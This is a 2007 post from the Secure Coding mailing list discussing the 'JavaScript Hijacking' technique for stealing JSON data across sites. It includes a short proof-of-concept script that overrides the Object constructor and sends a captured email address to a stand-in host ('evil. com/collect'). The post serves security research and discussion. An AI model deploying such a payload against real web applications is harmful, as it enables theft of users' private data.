Re: [SC-L] JavaScript Hijacking

Tue, 03 Apr 2007 10:08:13 -0700 

Hi Brian,
Il giorno lun, 02/04/2007 alle 12.13 -0700, Brian Chess ha scritto:
> Hi Stefano,
> 
> Yes, we are aware of your paper, but we intentionally chose to omit the
> reference because we are quite snobby.  I'm joking!

:DD lol

> The difference between what you discuss and JavaScript Hijacking is that we
> do not assume the presence of another defect.  JavaScript Hijacking does not
> require the existence of a cross-site scripting vulnerability or the like.
> It's a new attack technique (and a new vulnerable code pattern), not a new
> method for exploiting an existing class of vulnerabilities.

Ok I see the difference. 
You are taking advantage of a pure json CSRF with a evil script which
contains a modified version of the Object prototype.
And when the callback function is executed you use a XMLHttpRequest in
order to send the information extracted by the instantiated object.

Well i can see that you don't require a XSS vuln on a host, but you
assume a vulnerability on a user who has to click on a link :)

Anyway, if there's a html injection on a 3rd site you could use an
iframe with an evil page like the one you described without waiting  for
a user to click on an untrusted link.

Or, if you cant use iframes, as XMLHttpRequest is restricted by same
origin policy, you dont need an evil page since you could use a XSS
vulnerable site as a vector in order to steal json informations with an
img tag.
--
<script>
function Object(){
 this.email setter =  captureObject;
}
function captureObject(x){
(new Image()).src='http:// evil. com/ collect?email='+x;
}
</script>
<script src='http:// vuln /json.js' ></script>
--

But this is just another way to accomplish your attack.

BTW very nice paper!

Regards,
Stefano

> Thanks,
> Brian

-- 
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer

Web: www.wisec.it
..................

Attachment: signature.asc
Description: Questa รจ una parte del messaggio firmata digitalmente

_______________________________________________
Secure Coding mailing list (SC-L) SC-L@securecoding.org
List information, subscriptions, etc - http://krvw.com/mailman/listinfo/sc-l
List charter available at - http://www.securecoding.org/list/charter.php
SC-L is hosted and moderated by KRvW Associates, LLC (http://www.KRvW.com)
as a free, non-commercial service to the software security community.
_______________________________________________

Reply via email to